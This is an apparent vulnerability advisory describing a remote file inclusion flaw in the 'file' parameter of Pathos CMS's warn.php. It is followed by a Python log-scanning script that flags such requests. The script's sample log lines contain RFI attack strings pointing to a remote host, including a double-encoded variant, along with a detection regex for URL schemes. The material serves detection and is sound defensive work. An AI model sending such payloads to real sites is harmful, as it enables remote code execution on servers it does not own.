Vendor: Pathos Content Management System
By: kezzap66345
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion (RFI)
Product Name: Pathos Content Management System
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Pathos Content Management System
The Pathos Content Management System contains a remote file inclusion (RFI) vulnerability in the 'warn.php' file. An attacker can include arbitrary remote files by manipulating the 'file' parameter in the URL.
Mitigation:
To mitigate this vulnerability, the vendor should validate and sanitize user input when including files.
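
Because the advisory lists no patch, requests that place a remote location in the 'file' parameter of 'warn.php' can be flagged from web server access logs. The following is an added example, not part of the original advisory or the product's code; the combined log format, the `/cms/` path, and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside an access log entry (combined log format is assumed).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value starting with a URL scheme or stream wrapper ("http:", "ftp:", "php:"),
# a protocol-relative "//" prefix, or a UNC "\\" prefix. Drive-letter paths
# such as "C:" also match, which is equally unexpected in an include parameter.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568 -> %68 -> h)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_file_values(log_line):
    """Return decoded 'file' values on warn.php requests that point off-host."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/warn.php"):
        return []
    hits = []
    # parse_qs performs the first round of percent-decoding itself.
    for value in parse_qs(target.query, keep_blank_values=True).get("file", []):
        decoded = fully_decode(value)
        if REMOTE_RE.match(decoded):
            hits.append(decoded)
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2007:10:00:00 +0000] "GET /cms/warn.php?file=license.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2007:10:00:05 +0000] "GET /cms/warn.php?file=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 97',
    '203.0.113.9 - - [01/Jan/2007:10:00:09 +0000] "GET /cms/warn.php?file=%2568ttp://remote.example/x.txt HTTP/1.1" 200 97',
    '203.0.113.7 - - [01/Jan/2007:10:00:12 +0000] "GET /cms/index.php?file=http://remote.example/x.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for hit in suspicious_file_values(line):
            print("possible RFI attempt:", hit)
```

A hit only shows that a remote location was requested; whether the include succeeded has to be confirmed from the response size, outbound connections from the web server, or PHP error logs.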